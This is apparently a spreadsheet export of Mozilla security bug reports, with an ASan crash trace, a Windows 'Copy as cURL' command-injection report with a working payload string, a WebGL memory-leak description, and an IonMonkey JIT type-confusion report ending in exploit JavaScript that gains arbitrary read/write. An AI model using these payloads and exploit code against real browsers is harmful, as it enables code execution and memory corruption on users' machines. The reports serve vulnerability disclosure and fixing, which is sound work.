	Line 226 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/chromium/src/base/message_loop.cc"
    #22 0x7fb966421a5c (libxul.so!nsBaseAppShell::Run()+0x5c)
	Line 161 of "/builds/slave/m-in-l64-asan-0000000000000000/build/widget/xpwidgets/nsBaseAppShell.cpp"
    #23 0x7fb969111676 (libxul.so!nsAppStartup::Run()+0xc6)
	Line 276 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/components/startup/nsAppStartup.cpp"
    #24 0x7fb968f29ca5 (libxul.so!XREMain::XRE_mainRun()+0x1de5)
	Line 4023 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #25 0x7fb968f2abda (libxul.so!XREMain::XRE_main(int, char**, nsXREAppData const*)+0x4fa)
	Line 4091 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #26 0x7fb968f2bb0b (libxul.so!XRE_main+0x3ab)
	Line 4331 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #27 0x459dcd (firefox!main+0x94d)
	Line 280 of "/builds/slave/m-in-l64-asan-0000000000000000/build/browser/app/nsBrowserApp.cpp"
    #28 0x7fb97416676c (libc.so.6!__libc_start_main+0xec)
	Line 226 of "libc-start.c"
    #29 0x45934c (firefox!_start+0x28)
Address 0x7fffa141ed10 is located in stack of thread T0 at offset 784 in frame
    #0 0x7fb9684f8a6f (libxul.so!nsDisplayNotation::Paint(nsDisplayListBuilder*, nsRenderingContext*)+0xf)
	Line 739 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/mathml/nsMathMLmencloseFrame.cpp"
  This frame has 11 object(s):
    [32, 64) 'rect'
    [96, 112) ''
    [160, 176) ''
    [224, 288) ''
    [320, 336) ''
    [384, 400) ''
    [448, 464) ''
    [512, 528) ''
    [576, 592) ''
    [640, 656) ''
    [704, 784) 'p'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
Shadow bytes around the buggy address:
  0x10007427bd50: f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00 00 00
  0x10007427bd60: 00 00 00 00 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2
  0x10007427bd70: 00 00 f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2
  0x10007427bd80: 00 00 f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2
  0x10007427bd90: 00 00 f4 f4 f2 f2 f2 f2 00 00 00 00 00 00 00 00
=&gt;0x10007427bda0: 00 00[f4]f4 f3 f3 f3 f3 00 00 00 00 00 00 00 00
  0x10007427bdb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007427bdc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007427bdd0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
  0x10007427bde0: 00 00 f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2 f2
  0x10007427bdf0: 00 00 00 00 f3 f3 f3 f3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7859==ABORTING</t>
        </is>
      </c>
      <c r="X1166" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1167">
      <c r="A1167" t="n">
        <v>1777800</v>
      </c>
      <c r="B1167" t="inlineStr">
        <is>
          <t>2022-07-02 06:36:42 -0700</t>
        </is>
      </c>
      <c r="C1167" t="inlineStr">
        <is>
          <t>devtools "Copy as cURL (Windows)" allows custom code execution in CMD</t>
        </is>
      </c>
      <c r="D1167" t="inlineStr">
        <is>
          <t>2024-05-30 10:57:42 -0700</t>
        </is>
      </c>
      <c r="E1167" t="n">
        <v>1</v>
      </c>
      <c r="F1167" t="n">
        <v>1</v>
      </c>
      <c r="G1167" t="n">
        <v>3</v>
      </c>
      <c r="H1167" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1167" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J1167" t="inlineStr">
        <is>
          <t>Netmonitor</t>
        </is>
      </c>
      <c r="K1167" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1167" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1167" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1167" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1167" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1167" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main109+][adv-esr102.7+]</t>
        </is>
      </c>
      <c r="Q1167" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1167" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1167" t="inlineStr">
        <is>
          <t>110 Branch</t>
        </is>
      </c>
      <c r="T1167" t="n">
        <v>1</v>
      </c>
      <c r="U1167" t="n">
        <v>0</v>
      </c>
      <c r="V1167" t="n">
        <v>24</v>
      </c>
      <c r="W1167" t="inlineStr">
        <is>
          <t>It is possible to construct a request which, when copied as a cURL command on Windows, will automatically execute arbitrary commands when pasted in cmd.exe.
Affected: devtools "Copy as cURL (Windows)" -&gt; cmd.exe (not Powershell)
Version: Firefox 102 and older
For example, the following request body will, upon pasting in cmd.exe:
1. Automatically execute curl with query evil
2. Auto start cmd.exe with custom parameters
3. Auto start calc.exe
query=evil\r\rcmd\" /c timeout /t 3 &amp; calc.exe\r\r
This turns into:
curl command ... --data-raw "query=evil"^
More?
More?
&lt;executes curl&gt;
"cmd"" /c timeout /t 3 &amp; calc.exe"^
More?
More?
&lt;executes attacker's cmd command&gt;
-----------
History:
Exists since April 2019, current code: https://hg.mozilla.org/mozilla-central/rev/c3f507baa3dea6e86274de6d57d3e638f2b3bb47#l2.89
This attempt tried to fix the older code, but didn't account for single \r characters.
----------
Background:
The \r\n new-line is the "native" new-line form on Windows, but CMD seems to have its own opinion on that.
Clipboard API: passed as-is, \r\n and \r and \n can roundtrip.
Writing to a file in text mode: \r\n turns into \r\r\n, \n -&gt; \r\n, \r -&gt; \r
Now comes the CMD:
\r -&gt; as if &lt;ENTER&gt; is pressed
\r\n -&gt; like &lt;ENTER&gt;
\n -&gt; Win10: no character at all
\n -&gt; Win7: like &lt;ENTER&gt;
I repeated this in the .html file descriptions below.
---------
PoC descriptions:
Win7-LFLF.html: Only automatically executes on Windows 7's CMD. With Win10 CMD the newline characters are lost
-&gt; Automatic command execution when pasted
Win10-LFLF.html: Due to newline chars being gobbled, the ^ escape now escapes a double-quote. We can abuse this in a different way to work on Win10.
-&gt; User must press ENTER to execute our command
Windows-CRCR.html: Due to Windows 10 CMD bug/feature of \n handling, this is the only variant that works on older and newer systems at the same time.
-&gt; Automatic command execution when pasted
----------
Suggested fix:
1. Split "Copy as cURL (Windows)" in two separate commands: for CMD and for Powershell. Their parsers are completely different. While I couldn't come up with a variant that'd work for PS, the current escapeStringWin() code produces garbage data for either shell when a string is supposed to be escaped.
2. A separate Powershell escape implementation
3. CMD escape impl: Only " \ % \r \n must be escaped, when using the current double-quote method.
3.1: Step 1: Escape double-quotes "", percent signs "%". Escape backslashes when followed by double quotes \"
3.2: Step 2: Normalize all new-line characters (they are inevitably (and already) mangled when using CMD)
3.2.1: replace \r\n -&gt; \n
3.2.2: replace \r -&gt; \n
3.2.3: replace \n -&gt; \r\n
3.2.4: escape new-lines
Note on 3.2.3: When testing ^\r\n\r\n new-lines through console.log, while displayed correctly, new-lines ended up duplicated when copied to clipboard. The ^\n\n construction displays and pastes correctly from FF console. However I think devtools' copy code doesn't modify the data, so there it must still be ^\r\n\r\n. Please test.
Further reading:
https://daviddeley.com/autohotkey/parameters/parameters.htm
http://www.windowsinspired.com/how-a-windows-programs-splits-its-command-line-into-individual-arguments/
http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/
http://www.windowsinspired.com/summary-of-important-concepts-for-quoting-and-escaping-command-line-arguments/
----------
escapeStringWinCmd
While describing the escape behaviour above, I ended up implementing it myself:
function escapeStringWinCmd(str) {
	return (
		'"' +
		str
			.replaceAll('"', '""')
			.replaceAll("%", '"%"')
			.replace(/([\\]+)(")/g, "$1$1$2") // escape backslashes only when followed by "
			.replaceAll("\r\n", '\n')
			.replaceAll("\r", '\n')
			.replaceAll("\n", '"^\r\n\r\n"') +
		'"'
	);
}
// The testStr must paste and execute cleanly after escaping:
// curl --trace trace.txt https://example.com/404 --data-raw &lt;here&gt;
// testStr = 'Lets CRLF \r\n then LF \n then CR \r then doublequote" then singlequote \' then percent % then env %os% then ampersand &amp; then backslash \\ 2bs \\\\ 3bs \\\\\\ 1bsQ \\" 2bsQ \\\\" 3bsQ \\\\\\" then special chars ~!@#$%^&amp;*()_+=-0987654321`,./&lt;?&gt;}]{[ |\\/ end'
----------
Testing
To test this, use curl --trace log.txt option, to see what curl actually receives on the command-line. That's because each Windows program does its own parsing for argv.
Example in CMD on Win10 (press ENTER for "More?"):
curl --trace trace.txt http://example.com/404 --data-raw "doublequote"" and percent "%" and backslash \\ and new"^
More?
More? "line"
Here the new line is passed as "new\nline" to the server.
=&gt; Send data, 56 bytes (0x38)
0000: 64 6f 75 62 6c 65 71 75 6f 74 65 22 20 61 6e 64 doublequote" and
0010: 20 70 65 72 63 65 6e 74 20 25 20 61 6e 64 20 62  percent % and b
0020: 61 63 6b 73 6c 61 73 68 20 5c 5c 20 61 6e 64 20 ackslash \\ and 
0030: 6e 65 77 0a 6c 69 6e 65                         new.line
Backslash escape:
curl --trace trace.txt http://example.com/404 --data-raw "backslash escape \\"
=&gt; Send data, 18 bytes (0x12)
0000: 62 61 63 6b 73 6c 61 73 68 20 65 73 63 61 70 65 backslash escape
0010: 20 5c                                            \
Other special cases:
curl --trace trace.txt http://example.com/404 --data-raw "doublequote"" and percent "%" and backslash \ double slash \\ and triple slash \\\ and bsq \\"" and dbsq \\\\"" and tbsq\\\\\\"" end"
=&gt; Send data, 120 bytes (0x78)
0000: 64 6f 75 62 6c 65 71 75 6f 74 65 22 20 61 6e 64 doublequote" and
0010: 20 70 65 72 63 65 6e 74 20 25 20 61 6e 64 20 62  percent % and b
0020: 61 63 6b 73 6c 61 73 68 20 5c 20 64 6f 75 62 6c ackslash \ doubl
0030: 65 20 73 6c 61 73 68 20 5c 5c 20 61 6e 64 20 74 e slash \\ and t
0040: 72 69 70 6c 65 20 73 6c 61 73 68 20 5c 5c 5c 20 riple slash \\\ 
0050: 61 6e 64 20 62 73 71 20 5c 22 20 61 6e 64 20 64 and bsq \" and d
0060: 62 73 71 20 5c 5c 22 20 61 6e 64 20 74 62 73 71 bsq \\" and tbsq
0070: 5c 5c 5c 22 20 65 6e 64                         \\\" end</t>
        </is>
      </c>
      <c r="X1167" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1168">
      <c r="A1168" t="n">
        <v>659349</v>
      </c>
      <c r="B1168" t="inlineStr">
        <is>
          <t>2011-05-24 09:36:04 -0700</t>
        </is>
      </c>
      <c r="C1168" t="inlineStr">
        <is>
          <t>WebGL allows access to uninitialised graphics memory</t>
        </is>
      </c>
      <c r="D1168" t="inlineStr">
        <is>
          <t>2024-05-29 15:55:48 -0700</t>
        </is>
      </c>
      <c r="E1168" t="n">
        <v>1</v>
      </c>
      <c r="F1168" t="n">
        <v>1</v>
      </c>
      <c r="G1168" t="n">
        <v>3</v>
      </c>
      <c r="H1168" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1168" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1168" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K1168" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1168" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1168" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1168" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1168" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1168" t="inlineStr">
        <is>
          <t>[sg:high][qa!]</t>
        </is>
      </c>
      <c r="Q1168" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1168" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1168" t="inlineStr">
        <is>
          <t>mozilla7</t>
        </is>
      </c>
      <c r="T1168" t="n">
        <v>1</v>
      </c>
      <c r="U1168" t="n">
        <v>0</v>
      </c>
      <c r="V1168" t="n">
        <v>46</v>
      </c>
      <c r="W1168" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Build Identifier: 
The linked conformance test checks that a WebGL canvas isn't given unintialised memory when it is resized. We found that it fails on some configurations on Windows XP and MacOS X. By using a larger canvas is it possible to view graphics data from other web pages, and on MacOS various parts of the desktop as well. 
I'm attaching a PoC that loads an iframe onto a texture (by applying a CSS transform/transition to it), then searches for it in graphics memory. An SVG color matrix filter is allied to it to set the red channel to a specific value which we then search for. Although the retrieved image is somewhat scrambled, the PoC could be further developed by encoding position information for each pixel into the color channels and using that information to reconstruct the whole image.
We've tested this with success on Intel and ATI cards on WinXP and Nvidia and Intel cards on some recent Macs.
Reproducible: Always
Steps to Reproduce:
1. Get WebGL context
2. Resize canvas
3. Copy WebGL canvas onto 2d canvas
4. read pixels</t>
        </is>
      </c>
      <c r="X1168" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1169">
      <c r="A1169" t="n">
        <v>992274</v>
      </c>
      <c r="B1169" t="inlineStr">
        <is>
          <t>2014-04-04 09:14:29 -0700</t>
        </is>
      </c>
      <c r="C1169" t="inlineStr">
        <is>
          <t>Assertion failure: i &lt; mLength, at ../../dist/include/mozilla/Vector.h:379</t>
        </is>
      </c>
      <c r="D1169" t="inlineStr">
        <is>
          <t>2015-08-30 12:12:18 -0700</t>
        </is>
      </c>
      <c r="E1169" t="n">
        <v>1</v>
      </c>
      <c r="F1169" t="n">
        <v>1</v>
      </c>
      <c r="G1169" t="n">
        <v>3</v>
      </c>
      <c r="H1169" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1169" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1169" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1169" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1169" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1169" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1169" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1169" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1169" t="inlineStr">
        <is>
          <t>[adv-main30+][adv-esr24.6+]</t>
        </is>
      </c>
      <c r="Q1169" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1169" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1169" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T1169" t="n">
        <v>1</v>
      </c>
      <c r="U1169" t="n">
        <v>0</v>
      </c>
      <c r="V1169" t="n">
        <v>43</v>
      </c>
      <c r="W1169" t="inlineStr">
        <is>
          <t>Running: 
js -e oomAfterAllocations\(447\) -f ./tests/shell.js -f ./tests/js1_7/geniter/shell.js -f ./tests/js1_7/geniter/regress-349331.js
on a linux 32bit debug build gives:
Assertion failure: i &lt; mLength, at ../../dist/include/mozilla/Vector.h:379
(gdb) bt
&gt; #0  0x08093ba5 in mozilla::VectorBase&lt;unsigned int, 128u, js::TempAllocPolicy, js::Vector&lt;unsigned int, 128u, js::TempAllocPolicy &gt;::operator[] (this=0xbfffe4e0, i=256)    at ../../dist/include/mozilla/Vector.h:379
&gt; #1  0x081d1ef3 in js::frontend::TokenStream::SourceCoords::lineIndexOf (this=0xbfffe4e0, offset=7444) at /home/h4writer/Build/mozilla-inbound/js/src/frontend/TokenStream.cpp:194
&gt; #2  0x08178176 in js::frontend::TokenStream::SourceCoords::lineNum (this=0xbfffe4e0, offset=7444) at /home/h4writer/Build/mozilla-inbound/js/src/frontend/TokenStream.cpp:233
&gt; #3  0x081242ee in UpdateLineNumberNotes (cx=0x8ac7f60, bce=0xbfffdc34, offset=7444) at /home/h4writer/Build/mozilla-inbound/js/src/frontend/BytecodeEmitter.cpp:377
&gt; #4  0x081243c8 in UpdateSourceCoordNotes (cx=0x8ac7f60, bce=0xbfffdc34, offset=7444) at /home/h4writer/Build/mozilla-inbound/js/src/frontend/BytecodeEmitter.cpp:410
&gt; #5  0x0813972d in js::frontend::EmitTree (cx=0x8ac7f60, bce=0xbfffdc34, pn=0x8afbf38) at /home/h4writer/Build/mozilla-inbound/js/src/frontend/BytecodeEmitter.cpp:6606
&gt; #6  0x081220ac in js::frontend::CompileScript (cx=0x8ac7f60, alloc=0x8abb62c, scopeChain=..., evalCaller=..., options=...,     chars=0x8b89018 u"/* -*- Mode: C++; tab-width: 8; indent-tabs-mode: nil; c-basic-offset: 2 -*-\n * This Source Code Form is subject to the terms of the Mozilla Public\n * License, v. 2.0. If a copy of the MPL was not dis"..., length=19878, source_=warning: (Internal error: pc 0x0 in read in psymtab, but not in symtab.) 0x0, staticLevel=0, extraSct=warning: (Internal error: pc 0x0 in read in psymtab, but not in symtab.)0x0) at /home/h4writer/Build/mozilla-inbound/js/src/frontend/BytecodeCompiler.cpp:376
&gt; #7  0x084acc9a in JS::Compile (cx=0x8ac7f60, obj=..., options=...,     chars=0x8b89018 u"/* -*- Mode: C++; tab-width: 8; indent-tabs-mode: nil; c-basic-offset: 2 -*-\n * This Source Code Form is subject to the terms of the Mozilla Public\n * License, v. 2.0. If a copy of the MPL was not dis"..., length=19878) at /home/h4writer/Build/mozilla-inbound/js/src/jsapi.cpp:4449
&gt; #8  0x084acd98 in JS::Compile (cx=0x8ac7f60, obj=..., options=...,     bytes=0x8b81010 "/* -*- Mode: C++; tab-width: 8; indent-tabs-mode: nil; c-basic-offset: 2 -*-\n * This Source Code Form is subject to the terms of the Mozilla Public\n * License, v. 2.0. If a copy of the MPL was not dis"..., length=19878) at /home/h4writer/Build/mozilla-inbound/js/src/jsapi.cpp:4464
&gt; #9  0x084ace62 in JS::Compile (cx=0x8ac7f60, obj=..., options=..., fp=0x8af91f8) at /home/h4writer/Build/mozilla-inbound/js/src/jsapi.cpp:4476
&gt; #10 0x0804c8d3 in RunFile (cx=0x8ac7f60, obj=..., filename=0xbffff1ca "./tests/shell.js", file=0x8af91f8, compileOnly=false) at /home/h4writer/Build/mozilla-inbound/js/src/shell/js.cpp:447
&gt; #11 0x0804d25f in Process (cx=0x8ac7f60, obj_=0xb5d2e040, filename=0xbffff1ca "./tests/shell.js", forceTTY=false) at /home/h4writer/Build/mozilla-inbound/js/src/shell/js.cpp:590
&gt; #12 0x0805fea6 in ProcessArgs (cx=0x8ac7f60, obj_=0xb5d2e040, op=0xbfffeeb0) at /home/h4writer/Build/mozilla-inbound/js/src/shell/js.cpp:5718
&gt; #13 0x08060a69 in Shell (cx=0x8ac7f60, op=0xbfffeeb0, envp=0xbffff01c) at /home/h4writer/Build/mozilla-inbound/js/src/shell/js.cpp:5931
&gt; #14 0x08061b1e in main (argc=9, argv=0xbfffeff4, envp=0xbffff01c) at /home/h4writer/Build/mozilla-inbound/js/src/shell/js.cpp:6197
In frame 1:
&gt; #1  0x081d1ef3 in js::frontend::TokenStream::SourceCoords::lineIndexOf (this=0xbfffe4e0, offset=7444) at /home/h4writer/Build/mozilla-inbound/js/src/frontend/TokenStream.cpp:194
&gt; 194             if (offset &lt; lineStartOffsets_[lastLineIndex_ + 1])
(gdb) p lineStartOffsets_.length()
$1 = 256
(gdb) p lastLineIndex_
$2 = 255
So we are reading out of bounds of the vector.</t>
        </is>
      </c>
      <c r="X1169" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1170">
      <c r="A1170" t="n">
        <v>1530958</v>
      </c>
      <c r="B1170" t="inlineStr">
        <is>
          <t>2019-02-27 01:32:04 -0800</t>
        </is>
      </c>
      <c r="C1170" t="inlineStr">
        <is>
          <t>Spidermonkey: IonMonkey's type inference is incorrect for constructors entered via OSR</t>
        </is>
      </c>
      <c r="D1170" t="inlineStr">
        <is>
          <t>2024-05-30 09:57:02 -0700</t>
        </is>
      </c>
      <c r="E1170" t="n">
        <v>1</v>
      </c>
      <c r="F1170" t="n">
        <v>1</v>
      </c>
      <c r="G1170" t="n">
        <v>3</v>
      </c>
      <c r="H1170" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1170" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1170" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1170" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1170" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1170" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1170" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1170" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1170" t="inlineStr">
        <is>
          <t>[GP0 disclosure deadline May 27][jsbugmon:testComment=5,origRev=198cd4a81bf2][post-critsmash-triage][adv-main66+][adv-esr60.6+]</t>
        </is>
      </c>
      <c r="Q1170" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1170" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1170" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T1170" t="n">
        <v>1</v>
      </c>
      <c r="U1170" t="n">
        <v>0</v>
      </c>
      <c r="V1170" t="n">
        <v>36</v>
      </c>
      <c r="W1170" t="inlineStr">
        <is>
          <t>A bug in IonMonkeys type inference system when JIT compiling and entering a constructor function via on-stack replacement (OSR) allows the compilation of JITed functions that cause type confusions between arbitrary objects.
# Prerequisites:
1. Spidermonkey can represent "plain" objects either as [NativeObject](https://github.com/mozilla/gecko-dev/blob/dbddac86aadf1d4871fb350bbe66db43728a9f81/js/src/vm/NativeObject.h#L431) or as [UnboxedObjects](https://github.com/mozilla/gecko-dev/blob/dbddac86aadf1d4871fb350bbe66db43728a9f81/js/src/vm/UnboxedObject.h#L168). NativeObjects are basically two pointers to type information objects (the "Group" and "Shape") as well as inline and out-of-line properties (both stored in NaN-boxed form) and elements. UnboxedObject, on the other hand, can store their properties in unboxed form, e.g. as native 32-bit integer or even 8-bit booleans. An UnboxedObject can always be converted to a NativeObject (by boxing the properties and potentially allocating out-of-line storage). This e.g. happens if, during a property assignment, the type of the new value mismatches the current type of the property. The function implementing the conversion can be found [here](https://github.com/mozilla/gecko-dev/blob/dbddac86aadf1d4871fb350bbe66db43728a9f81/js/src/vm/NativeObject.h#L431).
2. Spidermonkey can [track the possible types of object properties](https://github.com/mozilla/gecko-dev/blob/dbddac86aadf1d4871fb350bbe66db43728a9f81/js/src/vm/ObjectGroup.h#L111) for the purpose of type inference. For example, after executing the following code (and assuming no other code ran that assigned a different value to a property .x), Spidermonkey will know that the property .x will always be a Uint8Array and uses that information to omit type checks in JIT compiled code.
    var o = {};
    o.x = new Uint8Array(0x1000);
    Assigning a value of a different type to such a property will invalidate (or widen) the inferred type and potentially invalidate any JITed code that relies on that.
3. A constructor in Spidermonkey can have a "template" type (Group and potentially Shape) associated with it which represents the type of the constructed objects *after* initialization has finished. The caller of such a constructor is responsible for allocating the newly constructed object of the final type (via js::CreateThisForFunction) and passing it as argument to the constructor. As such, JITed code for a constructor can rely on receiving an object of the template type and can use that to emit code for property stores to existing properties instead of code for property definitions (which in addition to writing the property value also have to update the Shape of the object).
As an example, consider the following constructor function:
    function Ctor() {
        this.a = 42;
        this.b = 43;
    }
    After several invocations, the type inference system will compute the final type of the constructed objects. In that case it could be UnboxedObject with two integer properties, .a and .b. At a later point IonMonkey would start JIT compiling the constructor. By relying on the fact that the caller will always pass in an object with the template type, IonMonkey can now emit code that simply stores the two values into the existing property slots. This optimization is only possible if Spidermonkey can prove that the constructed object doesn't escape the local scope before the final property definition (and so the existence of the properties before they are actually defined in the code isn't visible to the running script). The result type for constructors is computed [here](https://github.com/mozilla/gecko-dev/blob/dbddac86aadf1d4871fb350bbe66db43728a9f81/js/src/vm/TypeInference-inl.h#L241).
# Bug Description
The following program, when run in Spidermonkey built from current release, results in observable misbehaviour: it doesn't show the property .x even though it should exist. Slight mutations of it can also result in nullderef crashes when assigning the property .x, which is how the original sample was found during fuzzing.
    function Hax(val, l) {
        this.a = val;
        for (let i = 0; i &lt; l; i++) {}
        this.x = 42;
    }
    for (let i = 0; i &lt; 1000; i++) {
        new Hax(1337, 1);
    }
    let obj = new Hax("asdf", 100000);
    console.log(Object.getOwnPropertyNames(obj));
    // prints only "a"
It appears that the following is happening here:
1. During repeated invocations in the outer loop, Spidermonkey's type inference system computes the resulting type for the constructed objects: an UnboxedObject with properties .a and .x of type integer. The constructor is then JIT compiled by IonMonkey, which makes use of the type inference to emit code for property stores to existing properties instead of property definitions.
2. During the final invocation, the JIT code attempts to set the property .a. However, the value now has the wrong type (string instead of integer) for the object. This triggers the following:
    - The current |this| object is converted to a NativeObject, which has the properties .a and .x
    - The result type for Hax is updated to now be a NativeObject with the two properties .a and .x (as the type inference for the constructor can still prove that both .a and .x will always be installed)
    - The |this| object is then ["rolled back"](https://github.com/mozilla/gecko-dev/blob/dbddac86aadf1d4871fb350bbe66db43728a9f81/js/src/vm/TypeInference.cpp#L4234) to the type it should currently have at this position in the bytecode. Afterwards, the Shape of |this| only indicates the existence of property .a (which is correct at the current position in the code). Presumably, this is done to avoid a situation in which script code can suddenly observe that the constructed object already has the final set of properties before they are defined in the code, which could e.g. happen if the initial analysis relied on the assumption that some function or method called in the constructor was always a specific, known function and inlined it.
    - Due to the type inference change, the JIT code is deoptimized and execution continues in the baseline JIT.
3. In the following loop, IonMonkey again starts compiling Hax, and enters into the JITed code via on-stack replacement (OSR) in the middle of the function at the head of the loop. During compilation, IonMonkey again relies on the "template" type for Hax and concludes that |this| must be a NativeObject with properties .a and .x. This is incorrect in this situation, as the rollback has removed the property .x.
4. After the loop finishes, the JITed code only performs the property stores as it believes that the object already has the final Shape. As such, the property store to .x is "forgotten" and Object.getOwnPropertyNames only shows the existence of property .a
# Exploitation
The JITed code after OSR expects |this| to already have the final type and thus only stores the property without updating the Shape. As a result, .x will not be visible and the next property defined on the constructed object afterwards will be assigned the same slot that .x was written into in the JITed code. With that, the following exploit becomes possible, which abuses the type inference mechanism for properties:
In the JITed code, after the loop:
1. Define a property .x on |this| as above. The compiler will infer the type of .x to be type X. This property will then be "forgotten" in the final call due to the bug.
2. Define a new property (of type Y) on the object. It will be stored into the same slot as .x (because that slot is free according the the object's Shape). This has to be a "slow path" property definition that doesn't rely on type inference and instead inspects the Shape of the object and determines the next free slot based on that.
3. Load property .x again. The compiler will infer the type of the loaded value to be X. However, it will actually load an object of type Y
As a result, it is now possible to compile JIT code that confuses an object of type X with an object of type Y where both X and Y can be arbitrarily chosen.
The following JavaScript program (tested against a local Spidermonkey build and Firefox 65.0.1) demonstrates this idea. It first triggers the type confusion between a Float64Array and a custom UnboxedObject, then gains arbitrary read/write from that, and finally crashes when writing to 0x414141414141:
    let ab = new ArrayBuffer(0x1000);
    let victim = new Uint8Array(0x1000);
    function Hax(val, l, trigger) {
        // In the final invocation:
        // Ultimately confuse these two objects which each other.
        // x will (eventually) be an UnboxedObject, looking a bit like an ArrayBufferView object... :)
        let x = {slots: 13.37, elements: 13.38, buffer: ab, length: 13.39, byteOffset: 13.40, data: []};
        // y is a real ArrayBufferView object.
        let y = new Float64Array(0x1000);
        // * Trigger a conversion of |this| to a NativeObject.
        // * Update Hax's template type to NativeObject with .a and .x (and potentially .y)
        // * Trigger the "roll back" of |this| to a NativeObject with only property .a
        // * Bailout of the JITed code due to type inference changes
        this.a = val;
        // Trigger JIT compilation and OSR entry here. During compilation, IonMonkey will
        // incorrectly assume that |this| already has the final type (so already has property .x)
        for (let i = 0; i &lt; l; i++) {}
        // The JITed code will now only have a property store here and won't update the Shape.
        this.x = x;
        if (trigger) {
            // This property definition is conditional (and rarely used) so that an inline cache
            // will be emitted for it, which will inspect the Shape of |this|. As such, .y will
            // be put into the same slot as .x, as the Shape of |this| only shows property .a.
            this.y = y;
            // At this point, .x and .y overlap, and the JITed code below believes that the slot
            // for .x still stores the UnboxedObject while in reality it now stores a Float64Array.
        }
        // This assignment will then corrupt the data pointer of the Float64Array to point to |victim|.
        this.x.data = victim;
    }
    for (let i = 0; i &lt; 1000; i++) {
        new Hax(1337, 1, false);
    }
    let obj = new Hax("asdf", 10000000, true);
    // Driver is now a Float64Array whose data pointer points to a Uint8Array.
    let driver = obj.y;
    // Write to address 0x414141414141 as PoC
    driver[7] = 3.54484805889626e-310;
    victim[0] = 42;
Please note: this bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
